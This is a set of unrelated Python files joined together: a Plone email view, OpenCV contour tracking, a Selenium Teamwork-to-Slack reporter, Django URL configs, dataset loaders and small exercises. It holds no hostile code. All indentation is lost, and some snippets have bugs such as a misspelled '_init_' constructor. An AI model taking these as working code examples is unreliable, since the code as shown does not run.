status = 'ok'
if not len(bookings) > 0:
status = 'nobookings'
logger.info('no bookings found...')
else:
view.show_form = False
html = view()
mailhost = plone.api.portal.get_tool('MailHost')
pprops = plone.api.portal.get_tool('portal_properties')
mto = self.request.get('send_to', self.default_send_to)
mfrom = 'SM <{}>'.format(pprops.email_from_address)
msubject = _(u"Abstract Team Done This") \
+ ' ' + self.current_date_display
html = mail_utils.prepare_email_content(
html, mfrom, mto, msubject)
mailhost.send(html, mto, mfrom, msubject)
logger.info('mail sent')
if self.redirect and self.request.get('status_message'):
if status == 'ok':
msg = _('Email sent.')
else:
msg = _('No bookings, no email send.')
messages = IStatusMessage(self.request)
messages.add(msg, type="info")
url = self.context.absolute_url() + '/@@idonethis'
if self.request.get('QUERY_STRING'):
qstring = self.request['QUERY_STRING'].split('&send_email')[0]
url += '?' + qstring
self.request.response.redirect(url)
return
else:
return status
class CronView(SendEmail):
redirect = False
DATE_FORMAT = '%d/%m/%Y'
def __call__(self):
today = datetime.today()
weekday = today.weekday()
# TODO: exclude holidays!
if weekday in (5, 6):
# sat or sun
return
if weekday == 0:
# monday, we want friday
dt = today - timedelta(3)
by_date = dt.strftime(self.DATE_FORMAT)
self.request.form['by_date'] = by_date
return self.send_email()
|
# coding: utf-8
# In[2]:
import cv2
import numpy as np
# # Contour - tracks continuous edges
#
# The contour retrieval modes are as follows
#
# cv2.RETR_EXTERNAL
#
# cv2.RETR_LIST
#
# cv2.RETR_CCOMP
#
# cv2.RETR_TREE
#
# The contour approximation modes are as follows
#
# cv2.CHAIN_APPROX_NONE
#
# cv2.CHAIN_APPROX_SIMPLE
#
# cv2.CHAIN_APPROX_TC89_L1
#
# cv2.CHAIN_APPROX_TC89_KCOS
# In[13]:
cap=cv2.VideoCapture(0) # opening default camera
while cap.isOpened():
ret, framee = cap.read() #reading the frame
frame = cv2.cvtColor(framee, cv2.COLOR_BGR2GRAY) #converting to gray scale
#frame=cv2.flip(frame,90)
ret,thresh=cv2.threshold(frame,127,255,0)
img, ctrs,hier = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(framee, ctrs, -1,(0,0,255),3)
cv2.imshow("thers",framee)
if cv2.waitKey(1)==27:
break
cap.release()
cv2.destroyAllWindows()
|
from operator import *
class QueryResult:
def _init_(self, url, title, pagerank):
self.url= url
self.title= title
self.pagerank= pagerank
def _repr_(self):
return repr((self.url, self.title, self.pagerank))
#Store file index into an array
f= open('index.txt', 'r')
index= []
line= f.readline()
while line != "":
t= line
t= t.lower()
t= t.strip()
index.append(t)
line= f.readline()
#Store file pagerank into an array
f= open('pagerank.txt', 'r')
pagerank= []
line= f.readline()
while line != "":
line= line.strip()
p= float(line)
pagerank.append(p)
line=f.readline()
#Store file test3 into an array
f= open('test3.txt', 'r')
line= f.readline()
pages= []
while line != "":
string= line.split()
url= string[1]
pages.append(url)
line= f.readline()
#Search index based on query inputed by user
a= 0
while a == 0:
results= []
term= raw_input("Enter Search Term: ")
term= term.strip()
if term == "ZZZ":
a= 1
else:
term= term.lower()
for i in range(len(pages)):
url= pages[i]
if index[i].find(term) != -1:
results.append((url, index[i], pagerank[i]))
if results == []:
print "No results for: " + term
else:
results= sorted(results, key=lambda queryresult: queryresult[2], reverse= True)
j= 0
while j < 5 and j < len(results):
print results[j]
j= j + 1
|
from selenium import webdriver
from bs4 import BeautifulSoup
import time
import pickle
import os
import random
import math
import yaml
import sys
import argparse
with open("config.yml", 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=yaml.SafeLoader)
driver = webdriver.Chrome(cfg['WebDriverPath'])
def login_and_search(tuser, tpassword):
#open login page
driver.get('https://team.website.com/#/projects/405949/time')
#enter username
email = driver.find_element_by_xpath('//*[@id="loginemail"]')
email.send_keys(tuser) # change it to your username
#enter password
password = driver.find_element_by_xpath('//*[@id="loginpassword"]')
password.send_keys(tpassword) #change it to your password
#click login
login = driver.find_element_by_xpath('//*[@id="app"]/div[1]/section/div[2]/div[2]/div/div/div/form/div[2]/button')
login.click()
return driver
def login_and_search_slack(suser, spassword):
#open login page
driver_slack.get('https://mycompany.slack.com/')
#maximize the window
#driver.maximize_window()
#enter username
email = driver_slack.find_element_by_xpath('//*[@id="email"]')
email.send_keys(suser) # change it to your username
#enter password
password = driver_slack.find_element_by_xpath('//*[@id="password"]')
password.send_keys(spassword) #change it to your password
#click login
login = driver_slack.find_element_by_xpath('//*[@id="signin_btn"]')
login.click()
return driver
def get_page_links(linkz, itemnumber, CBList = 0):
driver.get(linkz)
time.sleep(10)
soup = BeautifulSoup(driver.page_source, 'lxml')
print('Collecting Information...')
data = []
table = soup.find_all('table', attrs={'class':'w-time-grid'})
#table_body = table.find('tbody')
project = soup.find('h1', attrs={'class':'w-header-titles__project-name'}).text.strip()
listdate = soup.find_all('h4', attrs={'class':'gridHeading subTitle'})
listdate = listdate[itemnumber].text.strip()
rows = table[itemnumber].find_all('tr')
tasks = []
del rows[0]
for row in rows:
cols = row.find_all('td')
tasks.append(cols[1].text.strip())
cols = [ele.text.strip() for ele in cols]
data.append([ele for ele in cols if ele])
#print(data)
table2 = soup.find_all('table', attrs={'class':'w-time-list__totals-table'})
rows = table2[itemnumber].find_all('tr')
data2 = []
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
data2.append([ele for ele in cols if ele])
print('cleaning Information...')
texttopost = '*' + listdate + '*\n'
texttopost = texttopost + '*_' + project + '_*\n'
texttopost = texttopost + '+++ ' + '\n+++ '.join(tasks) + '\n'
texttopost = texttopost + 'Total: `' + rows[0].find_all('td')[1].text.strip() + '`\n'
texttopost = texttopost + 'None Billable: `' + rows[2].find_all('td')[1].text.strip() + '`\n'
texttopost = texttopost + 'Billable: `' + rows[3].find_all('td')[1].text.strip() + '`\n'
totalhours = float(rows[0].find_all('td')[2].text.strip())
if CBList != 0:
listCBitems = CBList.split(',') # ['Drupal','Wordpress','Android','Server','Youtube Intergration']
if totalhours < 8:
CBhours = str(float(8 - totalhours))
Numbx = CBhours.split('.')
d, i = (Numbx[1], Numbx[0]) #math.modf(CBhours)
minu = str(int(0.6 * int(d)))
hour = str(int(i))
randomtitle = ''
if listCBitems:
randomtitle = '+++ ' + str(listCBitems[random.randrange(len(listCBitems))]) + ' '
texttopost = texttopost + '*_Capacity building_*\n' + randomtitle + ' `' + hour + ' Hours And ' + minu[:2] + ' Minutes`\n'
print('Generating Text...')
print(texttopost)
return texttopost
def post_toslack(linkz, texttopost):
print('openings Channel...')
driver_slack.get(linkz)
time.sleep(20)
print('Posting Text...')
boxx = driver_slack.find_element_by_xpath('//*[@id="undefined"]')
boxx.send_keys(texttopost) # change it to your username
########################################### MAIN ###################################
print('Opening TeamWork...')
login_and_search(cfg['teamuser'],cfg['teampassword'])
time.sleep(20)
print('Going to Time Page...')
texttopost = get_page_links(cfg['projectURL'], cfg['ListNumber'], cfg['RandomCBSubjects'])
driver.quit()
print('TeamWork Closed.')
print('Opening Slack...')
driver_slack = webdriver.Chrome(cfg['WebDriverPath'])
#time.sleep(10)
print('Login Slack...')
login_and_search_slack(cfg['slackuser'],cfg['slackpassword'])
#time.sleep(20)
post_toslack(cfg['slackchannelURL'], texttopost)
#driver.quit()
####################################################################################
|
from random import *
class HealthPotion():
#Constructs a name, the amount in the potion, and if it is large or small
def __init__(self, contain, category):
self.contain = contain
self.category = category
#Gets what kind of potion it is
def get_potion_type(self):
if self.category > 50:
print("Congrats! This heals for 50 health.")
elif self.category < 50 and self.category > 0:
print("This heals for 25 helat+h.")
else:
print("Not your lucky day... there is no health potion...")
#Gets the amount of the potion inside
def get_amount(self):
if self.contain == 0 and self.category == 0:
print("Stopping turning over the box... THERE IS NOTHING HERE!!!")
elif self.contain > 0 and self.contain <=4:
print("You have found " + self.contain + " amount of potions, Pick some up")
else:
print("You have found many potions! You can take up to 7")
#Gets the name of the potion
def get_name(self):
if self.category > 50:
print("BIG POTION")
elif self.category < 50:
print("SMALL POTION")
else:
print("NONE HAHAHA")
def set_contained(self):
self.contain = randrange(0,6)
def set_types(self):
self.category = randrange(0,85)
|
# calculates sum of two linked lists
class ListNode (object):
def __init__(self, x):
self.val = x
self.next = None
def add_two_numbers(node, l1, l2, c =0):
if (not(node)):
node = ListNode((l1.val + l2.val + c) % 10)
else:
node.next = ListNode((l1.val + l2.val + c) % 10)
if (l1.val + l2.val >= 10):
c = 1
else:
c = 0
if (l1.next and l2.next):
add_two_numbers(node.next, l1.next, l2.next, c)
return node
l1= ListNode (2)
l1.next = ListNode (4)
l1.next.next = ListNode (3)
l2 = ListNode (5)
l2.next = ListNode (6)
l2.next.next = ListNode (4)
l3 = ListNode(object)
result = add_two_numbers(l3, l1, l2)
while result:
print (result.val),
result = result.next |
'''
Build a dataset with train-val-test splits from the generated data from
'''
import sys; sys.path.insert(0, '../util')
from platform_config import data_dir, mkdir2
import os, glob, random, math
from os.path import join
from shutil import copy2
import numpy as np
# for converting to indexed images
from PIL import Image
from cityscapes import c2clabelfromrgb, cm_train
build_dir = mkdir2(join(data_dir, 'Exp/C20_S1')) # gen 18, weather 2, subsampling step 1
train_source_dir = join(data_dir, 'Exp/CARLA_gen20')
test_source_dir = join(data_dir, 'Exp/CARLA_gen20_town2')
rgb_dir = mkdir2(join(build_dir, 'RGB-1024'))
seg_dir = mkdir2(join(build_dir, 'Seg-1024'))
n_frame = 10000
train_seqs = glob.glob(join(train_source_dir, 'e*'))
train_seqs = sorted(list(filter(lambda s: os.path.isdir(s), train_seqs)))
test_seqs = glob.glob(join(test_source_dir, 'e*'))
test_seqs = sorted(list(filter(lambda s: os.path.isdir(s), test_seqs)))
n_val = 2
n_train = len(train_seqs) - n_val
seqs = train_seqs + test_seqs
n_seq = len(seqs)
cnts = 3*[0]
f = 3*[None]
splits = ['train', 'val', 'test']
for s in range(3):
mkdir2(join(rgb_dir, splits[s]))
mkdir2(join(seg_dir, splits[s]))
with open(join(build_dir, 'original-filename-train.txt'), 'w') as f[0], \
open(join(build_dir, 'original-filename-val.txt'), 'w') as f[1], \
open(join(build_dir, 'original-filename-test.txt'), 'w') as f[2]:
for i in range(n_seq):
print('Processing %d/%d - %s' % (i + 1, n_seq, seqs[i]))
seq_name = os.path.basename(seqs[i])
if i < n_train:
s = 0
elif i < n_train + n_val:
s = 1
else:
s = 2
for j in range(n_frame):
cnts[s] += 1
inname = '%08d.png' % (j + 1)
outname = '%08d.png' % cnts[s]
copy2(join(seqs[i], 'RGB', inname), join(rgb_dir, splits[s], outname))
copy2(join(seqs[i], 'Seg', inname), join(seg_dir, splits[s], outname))
f[s].write(seq_name + '/RGB/' + inname + '\n') |
from django.conf.urls import url
from . import views
app_name = 'telegram_bots'
urlpatterns = [
url(
regex=r'^$',
view=views.BotListView.as_view(),
name='list',
),
url(
regex=r'^(?P<pk>\d+)/$',
view=views.BotDetailView.as_view(),
name='detail',
),
url(
regex=r'^~create/$',
view=views.BotCreateView.as_view(),
name='create',
),
url(
regex=r'^~update/$',
view=views.BotUpdateView.as_view(),
name='update',
),
url(
regex=r'^~delete/$',
view=views.BotDeleteView.as_view(),
name='delete',
),
url(
regex=r'^~subscribe/(?P<signature>.+)/$',
view=views.BotSubscribeView.as_view(),
name='subscribe'
),
url(
regex=r'^(?P<bot_token>.+)/$',
view=views.CommandReceiveView.as_view(),
name='auth'
),
] |
import torch
from torch.utils.data import DataLoader
from data.jigsaw_dataset import JigsawDataset, JigsawTestDataset
from data.rotate_dataset import RotateDataset, RotateTestDataset
from data.image_dataset import ImageDataset, ImageTestDataset
from data.concat_dataset import ConcatDataset
from data.transformers import get_jig_train_transformers, get_train_transformers, get_train_transformers_fgadr
from data.transformers import get_val_transformer, get_multi_crop_transformers
from data.transformers import get_image_train_transformer, get_image_test_transformer
from data.fgdr_dataset import FGADRDataset, FGADRTestDataset
from data.kaggleR_dataset import KaggleRDataset, KaggleRTestDataset
class Subset(torch.utils.data.Dataset):
def __init__(self, dataset, limit):
indices = torch.randperm(len(dataset))[:limit]
self.dataset = dataset
self.indices = indices
def __getitem__(self, idx):
return self.dataset[self.indices[idx]]
def __len__(self):
return len(self.indices)
def get_train_val_dataloader(args):
dataset_list = args.name
assert isinstance(dataset_list, list)
datasets = []
val_datasets = []
limit = args.limit
# print("dataset_list: ", dataset_list)
# image mode
mode = args.get('mode', 'RGB')
for dname in dataset_list:
print(dname)
if dname == 'FGADR':
# print("coming to FGADR")
img_transformer = get_train_transformers_fgadr(args)
train_dataset = FGADRDataset(dname, split='train', val_size=args.val_size,
img_transformer=img_transformer,
rot_classes=args.aux_classes,
bias_whole_image=args.bias_whole_image, mode=mode)
val_dataset = FGADRDataset(dname, split='val', val_size=args.val_size,
img_transformer=get_train_transformers_fgadr(args), rot_classes=args.aux_classes,
mode=mode)
loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=4,
pin_memory=True, drop_last=True)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=4, pin_memory=True, drop_last=False)
return loader, val_loader
elif dname == 'KaggleR':
print("coming to KaggleR")
img_transformer = get_train_transformers_fgadr(args)
train_dataset = KaggleRDataset(dname, split='train', val_size=args.val_size,
img_transformer=img_transformer,
rot_classes=args.aux_classes,
bias_whole_image=args.bias_whole_image, mode=mode)
val_dataset = KaggleRDataset(dname, split='val', val_size=args.val_size,
img_transformer=get_train_transformers_fgadr(args), rot_classes=args.aux_classes,
mode=mode)
loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=4,
pin_memory=True, drop_last=True)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=4, pin_memory=True, drop_last=False)
return loader, val_loader
else:
if args.type == 'jigsaw':
img_transformer, tile_transformer = get_jig_train_transformers(args)
train_dataset = JigsawDataset(dname, split='train', val_size=args.val_size,
img_transformer=img_transformer, tile_transformer=tile_transformer,
jig_classes=args.aux_classes, bias_whole_image=args.bias_whole_image)
val_dataset = JigsawTestDataset(dname, split='val', val_size=args.val_size,
img_transformer=get_val_transformer(args), jig_classes=args.aux_classes)
elif args.type == 'rotate':
img_transformer = get_train_transformers(args)
train_dataset = RotateDataset(dname, split='train', val_size=args.val_size,
img_transformer=img_transformer,
rot_classes=args.aux_classes,
bias_whole_image=args.bias_whole_image, mode=mode)
val_dataset = RotateTestDataset(dname, split='val', val_size=args.val_size,
img_transformer=get_val_transformer(args), rot_classes=args.aux_classes, mode=mode)
elif args.type == 'image':
img_transformer = get_image_train_transformer(args)
train_dataset = ImageDataset(dname, split='train', val_size=args.val_size,
img_transformer=img_transformer, mode=mode)
val_dataset = ImageTestDataset(dname, split='val', val_size=args.val_size,
img_transformer=get_val_transformer(args), mode=mode)
if limit:
train_dataset = Subset(train_dataset, limit)
datasets.append(train_dataset)
val_datasets.append(val_dataset)
dataset = ConcatDataset(datasets)
val_dataset = ConcatDataset(val_datasets)
loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True, drop_last=False)
return loader, val_loader
def get_target_dataloader(args):
name = args.name
mode = args.get('mode', 'RGB')
if name == 'FGADR':
img_transformer = get_train_transformers_fgadr(args)
dataset = FGADRDataset(name, 'train', img_transformer=img_transformer,
rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
return loader
elif name == 'KaggleR':
img_transformer = get_train_transformers_fgadr(args)
dataset = KaggleRDataset(name, 'train', img_transformer=img_transformer,
rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
return loader
else:
if args.type == 'jigsaw':
img_transformer, tile_transformer = get_jig_train_transformers(args)
dataset = JigsawDataset(name, 'train', img_transformer=img_transformer,
tile_transformer=tile_transformer, jig_classes=args.aux_classes,
bias_whole_image=args.bias_whole_image)
elif args.type == 'rotate':
img_transformer = get_train_transformers(args)
dataset = RotateDataset(name, 'train', img_transformer=img_transformer,
rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
elif args.type == 'image':
img_transformer = get_image_train_transformer(args)
dataset = ImageDataset(name, 'train', img_transformer=img_transformer, mode=mode)
loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
return loader
def get_test_dataloader(args):
name = args.name
mode = args.get('mode', 'RGB')
loaders = []
if name == 'FGADR':
img_trs = get_train_transformers_fgadr(args)
val_dataset = FGADRTestDataset(name, split='test',
img_transformer=img_trs, rot_classes=args.aux_classes, mode=mode)
# dataset = ConcatDataset([val_dataset])
loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
pin_memory=True, drop_last=False)
return loader
# if name == 'FGADR':
# for img_tr in img_trs:
# val_dataset = FGADRTestDataset(name, split='test',
# img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
#
# dataset = ConcatDataset([val_dataset])
# loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
# pin_memory=True, drop_last=False)
# if args.get('multi_crop', False):
# loaders.append(loader)
# else:
# return loader
#
# return loaders
elif name == 'KaggleR':
img_trs = get_train_transformers_fgadr(args)
val_dataset = KaggleRTestDataset(name, split='test',
img_transformer=img_trs, rot_classes=args.aux_classes, mode=mode)
# dataset = ConcatDataset([val_dataset])
loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
pin_memory=True, drop_last=False)
return loader
# for img_tr in img_trs:
# val_dataset = KaggleRTestDataset(name, split='test',
# img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
#
# dataset = ConcatDataset([val_dataset])
# loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
# pin_memory=True, drop_last=False)
# if args.get('multi_crop', False):
# loaders.append(loader)
# else:
# return loader
#
# return loaders
else:
img_trs = get_multi_crop_transformers(args)
for img_tr in img_trs:
if args.type == 'jigsaw':
val_dataset = JigsawTestDataset(name, split='test',
img_transformer=img_tr, jig_classes=args.aux_classes)
elif args.type == 'rotate':
val_dataset = RotateTestDataset(name, split='test',
img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
elif args.type == 'image':
val_dataset = ImageTestDataset(name, split='test',
img_transformer=img_tr, mode=mode)
if args.limit and len(val_dataset) > args.limit:
val_dataset = Subset(val_dataset, args.limit)
print("Using %d subset of dataset" % args.limit)
dataset = ConcatDataset([val_dataset])
loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True, drop_last=False)
if args.get('multi_crop', False):
loaders.append(loader)
else:
return loader
return loaders
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@Time : 2020/5/11 20:44
@Auth : 可优
@File : handle_parameterize.py
@IDE : PyCharm
@Motto: ABC(Always Be Coding)
@Email: keyou100@qq.com
@Company: 湖南省零檬信息技术有限公司
@Copyright: 柠檬班
-------------------------------------------------
"""
# 0、导入re模块
import re
# 1、创建全局数据池类
# 存储全局数据(三个用户账号、未注册的手机号等)
class GlobalData:
pass
# 2、定义原始字符串
# {"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}
# {"mobile_phone": "18900001111", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}
# one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}'
# one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "uid":" ${user_id}", "type": 1, "reg_name": "KeYou"}'
# 3、定义正则表达式
# a.findall方法将正则匹配上的值放在列表中返回
# b.第一个参数为正则表达式,需要在字符串前加r
# c.第二个参数为待匹配的字符串
# d.如果匹配不上,会返回空列表
# e.$有特殊含义,所以需要使用\来转义
# f. .*?可以匹配任意数据,为非贪婪模式进行匹配
# result = re.findall(r"\${.*?}", one_str)
# for item in result:
# data = getattr(GlobalData, item)
# one_str = one_str.replace(item, str(data))
class Parameterize:
@staticmethod
def to_parma(src):
# a.把src字符串中的说哟${}查询出来,返回一个列表
result = re.findall(r"\${.*?}", src)
for item in result:
# b.从全局数据池中读取参数
data = getattr(GlobalData, item)
# c.替换指定的数据,然后将原始字符串src覆盖
# 也可以使用re.sub去替换
src = src.replace(item, str(data))
return src
if __name__ == '__main__':
# one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "uid":" ${user_id}", "type": 1, "reg_name": "KeYou"}'
two_str = '{"mobile_phone": "${invest_user_tel}", "pwd": "12345678", "reg_name": "KeYou"}'
setattr(GlobalData, "${not_existed_tel}", "18911112222")
setattr(GlobalData, "${user_id}", "3333")
setattr(GlobalData, "${invest_user_tel}", "18911114444")
Parameterize.to_parma(two_str)
pass
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
# Uncomment the next two lines to enable the admin:
#from django.contrib import admin
#admin.autodiscover()
import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^Viewer/', include('Viewer.urls',namespace="Viewer")),
# url(r'^SUPERSTAR/', include('SUPERSTAR.urls',namespace="SUPERSTAR")),
#url(r'^GLOOP/', include('GLOOP.urls',namespace="GLOOP")),
url(r'^OOMMPPAA/', include('OOMMPPAA.urls',namespace="OOMMPPAA")),
#url(r'^LLOOMMPPAA/', include('LLOOMMPPAA.urls',namespace="LLOOMMPPAA")),
url(r'^WONKA/', include('WONKA.urls',namespace="WONKA")),
# url(r'^admin/', include(admin.site.urls)),
url( r'^upload/', views.upload, name = 'jfu_upload' ),
url(r'^run/$', views.run, name='run'),
)+static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from task_management.ticktick import util
from task_management.ticktick.entities.ticktick_task import TicktickTask
import json
class TicktickApi:
def task(self, context, params):
'''Get tasks '''
access_token = context["headers"]["access_token"]
project_id = params.get("project_id")
task_id = params.get("task_id")
endpoint = f"open/v1/project/{project_id}/task/{task_id}"
response = json.loads(util.rest("GET", endpoint, access_token).text)
task_obj = TicktickTask(
task_id=response.get('id'),
name=response.get('title'),
content=response.get('content'),
start_date=response.get('startDate'),
due_date=response.get('dueDate'),
priority=response.get('priority'),
timezone=response.get('timeZone')
)
return task_obj.__dict__ |
from MyCollections.LinkedList import LinkedList
class ListQueue:
def __init__(self):
self._data = LinkedList()
def enqueue(self, value):
self._data.insertAtTail(value)
def dequeue(self):
return self._data.pop_head()
def is_empty(self):
return (self._data.size() == 0)
def size(self):
self._data.size()
|
import json
class Settings():
def __init__(self):
with open("config.json", "r") as f:
data = json.load(f)
self.coordinates = data["coordinates"]
self.hight = data["hight"]
self.azimut_ahgle_cam = data["azimut_ahgle_cam"]
self.ip_camera = data["ip_camera"]
self.login = data["login"]
self.password = data["password"]
self.port = data["port"]
self.key_google_maps = data["key_google_maps"]
def read_data_from_file(self, data):
self.coordinates = data["coordinates"]
self.hight = data["hight"]
self.azimut_ahgle_cam = data["azimut_ahgle_cam"]
self.ip_camera = data["ip_camera"]
self.login = data["login"]
self.password = data["password"]
self.key_google_maps = data["key_google_maps"]
|
# -*- coding: utf-8 -*-
# @Author: mithril
from __future__ import unicode_literals, print_function, absolute_import
import pandas as pd
import json
from collections import Counter
df = pd.read_excel('CorpusCharacterlist.xls')
chars = set(df.iloc[:, [1]].values.flatten())
with open('wubi_all.json') as f:
d = json.loads(f.read())
def build_unique_wubi(d, output):
c = Counter()
for k, v in d.items():
p = c.get(v, 0)
c[v]+=1
if p:
d[k] +=str(p)
open(output, 'w').write(json.dumps(d))
print(c.most_common(10))
def build_usual_unique_wubi(d, output):
for k in d.keys():
if k not in chars:
del d[k]
build_unique_wubi(d, output)
return d
# build_unique_wubi(d, 'wubi_unique_all.json')
if __name__ == '__main__':
# from IPython.core import debugger
# debugger.Pdb().set_trace()
build_unique_wubi(d, 'wubi_unique_all.json')
build_usual_unique_wubi(d, 'wubi_unique_usual.json')
|
import logging
import os
import sys
from django.contrib.auth import get_user_model
from django.core.management.commands.test import Command as BaseCommand
import pandas
from core.models import Link
User = get_user_model()
logger = logging.getLogger(__name__)
def import_link(user: User, link: str):
try:
new_url = Link(original_link=link, user=user)
new_url.save()
message = f'Successfully saved link="{link}" (id="{new_url.id}")'
logger.info(message)
except Exception as ex:
message = f'Exception trying to save link="{link}": {ex}'
logger.error(message)
class Command(BaseCommand):
help = 'Populate Links from a csv'
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument(
'--username',
dest='username',
required=True,
default=None,
help='The username that will own imported links.',
)
parser.add_argument(
'--csv-file-path',
dest='csv_file_path',
required=True,
default=None,
help=(
'The full csv file path that contains links to be imported.'
),
)
def validate_user(self, username: str) -> User:
links_user = User.objects.filter(username=username).first()
if not links_user:
available_users = User.objects.values_list(
'username', flat=True
).order_by('username')
message = f'There is no use with username={username}. '
if len(available_users) > 0:
message += f'Available users: {", ".join(available_users)}'
else:
message += (
'There are no available users, '
'at least one must be created manually.'
)
self.stdout.write(self.style.ERROR(message))
sys.exit(1)
return links_user
def finish_if_csv_file_does_not_exist(self, path: str) -> bool:
if not os.path.exists(path):
message = f'There is not a file at filesystem path "{path}".'
self.stdout.write(self.style.ERROR(message))
sys.exit(1)
def validate_existing_columns(self, dataframe):
mandatory = {'link'}
existing_columns = mandatory.intersection(set(dataframe.columns))
if not existing_columns:
message = f'Mandatory columns missing from file: {mandatory}'
self.stdout.write(self.style.ERROR(message))
sys.exit(1)
def handle(self, *args, **options): # pylint: disable=unused-argument
"""
To test manually:
make local-links-csv-import-test
"""
username = options.get('username')
csv_file_path = options.get('csv_file_path')
links_user = self.validate_user(username)
self.finish_if_csv_file_does_not_exist(csv_file_path)
self.stdout.write(
f'Importing csv file "{csv_file_path}" '
f'for username "{links_user.username}"... '
)
dataframe = pandas.read_csv(csv_file_path)
self.validate_existing_columns(dataframe)
dataframe.link.apply(
lambda value: import_link(link=value, user=links_user)
)
|
import csv, sys
from robot import robot, check_command
print '#########################'
print '## Toy Robot Simulator ##'
print '######### IMPORT ########'
print '#########################'
print ''
print ''
filename = sys.argv[1]
commands = []
with open(filename) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
print row['command']
if(check_command(row['command'])):
commands.append(row['command'])
else:
print 'Wrong command, try again'
print 'Output:'
robot(commands) |
from __future__ import annotations
from prettyqt import constants, gui
class TextTableFormat(gui.textframeformat.TextFrameFormatMixin, gui.QTextTableFormat):
def __bool__(self):
return self.isValid()
def set_alignment(self, alignment: constants.AlignmentStr | constants.AlignmentFlag):
"""Set the alignment of the format.
Args:
alignment: alignment for the format
"""
self.setAlignment(constants.ALIGNMENTS.get_enum_value(alignment))
def get_alignment(self) -> constants.AlignmentStr:
"""Return current alignment.
Returns:
alignment
"""
return constants.ALIGNMENTS.inverse[self.alignment()]
def get_column_width_constraints(self) -> list[gui.TextLength]:
return [gui.TextLength(i) for i in self.columnWidthConstraints()]
if __name__ == "__main__":
fmt = TextTableFormat()
print(fmt)
|
from __future__ import division, print_function
from matplotlib import pyplot as plt
import matplotlib
import seaborn as sns
import pandas as pd
import numpy as np
from utils.utils import get_commenters_dataframe, locaP, locaC, geod_world, geod_china
dataframe = get_commenters_dataframe()
def df_preprocess():
dataframe['province'] = dataframe.location.apply(locaP)
dataframe.province.fillna('oversea', inplace=True)
dataframe['country'] = dataframe.location.apply(lambda x: x.split(sep=',')[-1].strip()) \
.apply(locaC)
dataframe.country.fillna('China', inplace=True)
def plot_follow():
matplotlib.rc('figure', figsize=(14, 7))
matplotlib.rc('font', size=14)
matplotlib.rc('axes', grid=False)
matplotlib.rc('axes', facecolor='white')
sns.jointplot(x="follower_num", y="following_num", data=dataframe)
plt.savefig('follow_analysis.jpg')
plt.show()
def province_followers():
temp = (dataframe.groupby(by='province').sum().follower_num / dataframe.province.value_counts()).sort_values(
ascending=False).reset_index()
print(temp.head(10))
def province_following():
temp = (dataframe.groupby(by='province').sum().following_num / dataframe.province.value_counts()).sort_values(
ascending=False).reset_index()
print(temp.head(10))
def commenter_country_analysis():
temp = dataframe.country.value_counts().reset_index()
df = pd.DataFrame({'NAME': temp['index'].tolist(), 'NUM': (np.log1p(temp['country']) + 10).tolist()})
geod_world(df, 'Where the brief comment comes from around world? ', )
plt.savefig('commenter_country_analysis.jpg')
plt.show()
print(temp.head(10))
def commenter_province_analysis():
temp = dataframe.province.value_counts().reset_index()
df = pd.DataFrame({'NAME': temp['index'].tolist(), 'NUM': (np.log1p(temp['province'])).tolist()})
geod_china(df, 'Where the brief comment comes from in China? ', legend=False)
plt.savefig('commenter_province_analysis.jpg')
plt.show()
print(temp.head(10))
if __name__ == '__main__':
df_preprocess()
# plot_follow()
# commenter_province_analysis()
# commenter_country_analysis()
# province_followers()
# province_following()
|
# -*- coding: utf-8 -*-
#! \file ./tests/test_support/test_cmd/test_eval.py
#! \author Jiří Kučera, <sanczes@gmail.com>
#! \stamp 2016-04-18 18:07:39 (UTC+01:00, DST+01:00)
#! \project DoIt!: Tools and Libraries for Building DSLs
#! \license MIT
#! \version 0.0.0
#! \fdesc @pyfile.docstr
#
"""\
Command processor's eval module tests.\
"""
__license__ = """\
Copyright (c) 2014 - 2017 Jiří Kučera.
Permission is hereby granted, free of charge, to any person obtaining a copy
